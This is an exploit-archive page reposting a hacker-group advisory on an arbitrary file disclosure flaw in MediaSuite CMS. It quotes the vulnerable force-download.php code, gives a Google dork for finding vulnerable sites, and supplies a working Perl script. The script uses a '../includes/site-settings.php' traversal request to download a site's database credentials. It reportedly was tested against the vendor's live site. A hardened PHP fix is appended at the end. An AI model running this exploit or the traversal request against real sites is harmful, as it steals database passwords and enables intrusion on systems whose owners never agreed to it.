MediaSuite.ca File Disclosure
http://www.securityhome.eu/exploits/exploit.php?eid=12874337365536c8edc8fe73.44028625
Article URL: exploit.php?eid=12874337365536c8edc8fe73.44028625
Author: SecurityHome.eu
Published: 22 April 2015

Proof Video: https://www.youtube.com/watch?v=7yxbfD1YK8Y

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] E-Mail : [email protected]
[~] Twitter: http://twitter.com/h4SEC
[~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org - http://www.fiXen.org
[~] Greetz: ZoRLu, DaiMon, VolqaN, DaiMon, KedAns-Dz , Septemb0x, BARCOD3, b3mb4m, SysToxic, EthicalHacker and all TurkSec Group members.
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : MediaSuite CMS - Arbitrary File Disclosure Exploit
|~Price : N/A
|~Version : All CMS
|~Software: http://www.mediasuite.ca
|~Vulnerability Style : File Disclosure
|~Vulnerability Dir : /
|~Google Dork : "MediaSuite.ca - Website Design, Media Marketing Suite - Barrie Ontario"
|[~]Date : "20.04.2015"
|[~]Exploit Tested on : >>>> www.mediasuite.ca ( Official Web ) <<<<<
------------------Info;------------------
The database password of any affected site can be obtained easily: reading "site-settings.php" is sufficient, because that file holds the settings for the local database.
The cause is careless, incorrect coding in the "force-download.php" file.
The code is laughable :)
##################################################
file in "force-download.php"
..
..
..
// Both values come straight from the query string and are never validated.
$type = $_GET['type'];
$file = $_GET['file'];
if($type == "1"){
    // "../" sequences in $file escape the uploads directory.
    $filename = "../uploads/$file";
}
..
..
..
}
header("Pragma: public"); // required
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false); // required for certain browsers
header("Content-Type: $ctype");
// change, added quotes to allow spaces in filenames, by Rajkumar Singh
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($filename));
readfile("$filename");
exit();
..
...
##################################################
------------------Demos------------------
##################################################
####################Exploit.pl####################
##################################################
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title MediaSuite CMS - Artibary File Disclosure Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. ";
&help;
exit();
}
sub help()
{
print "[+] Usaqe : perl $0 Target /path/ ";
print "[+] Usage : perl $0 localhost / ";
}
print " ************************************************************************ ";
print "* MediaSuite CMS - Artibary File Disclosure Exploit * ";
print "* Exploit coded by : KnocKout * ";
print "* Contact : twitter.com/h4SEC * ";
print "* -- * ";
print "********************************************************************* ";
($TargetIP, $path, $File,) = @ARGV;
$File="includes/force-download.php?type=1&file=../includes/site-settings.php";
my $url = "http://" . $TargetIP . $path . $File;
print " Biraz Bekle. ";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "site-settings.php");
if ($request->is_success)
{
print "[+] Exploit Basarili, kodlayanin eline saglik ";
print "[+] Exploit Basarili. ! ";
print "[+] Database bilgilerinin yer aldigi (site-settings.php) dosyasi indirildi. ";
print "[+] h4 SEC ";
print "[+] Special tnX : ZoRLu, _UnDeRTaKeR, DaiMon, VoLqaN, BARCOD3, Septemb0x, EthicalHacker ";
exit();
}
else
{
print "[!] Exploit $url Basarisiz ! [!] ".$request->status_line." ";
exit();
}
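A hardened form of the type=1 branch of "force-download.php" shown above, as an added example that is not MediaSuite's code or the advisory author's. It assumes downloads are only ever meant to come from the uploads directory next to includes/; the function name resolve_upload and the blocked-extension list are hypothetical.

```php
<?php
// Added example: hardened variant of the type=1 download branch.
// Assumption: the only legitimate download root is ../uploads.

function resolve_upload(string $baseDir, string $requested): ?string
{
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null; // empty name or embedded NUL byte
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" and follows symlinks; it returns false
    // when the target does not exist.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // The resolved path must still sit inside the uploads directory.
    // The trailing separator stops "/uploads-old/x" matching "/uploads".
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Never serve server-side source or config, wherever it is stored.
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    if (in_array($ext, ['php', 'phtml', 'inc', 'ini', 'htaccess'], true)) {
        return null;
    }
    return $path;
}

$type = $_GET['type'] ?? '';
$file = $_GET['file'] ?? '';
$path = ($type === '1' && is_string($file))
    ? resolve_upload(__DIR__ . '/../uploads', $file)
    : null;
if ($path === null) {
    http_response_code(404);
    exit();
}
$name = str_replace('"', '', basename($path));
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
exit();
```

With this check a request for "../includes/site-settings.php" resolves outside the uploads directory and gets a 404 instead of the file contents.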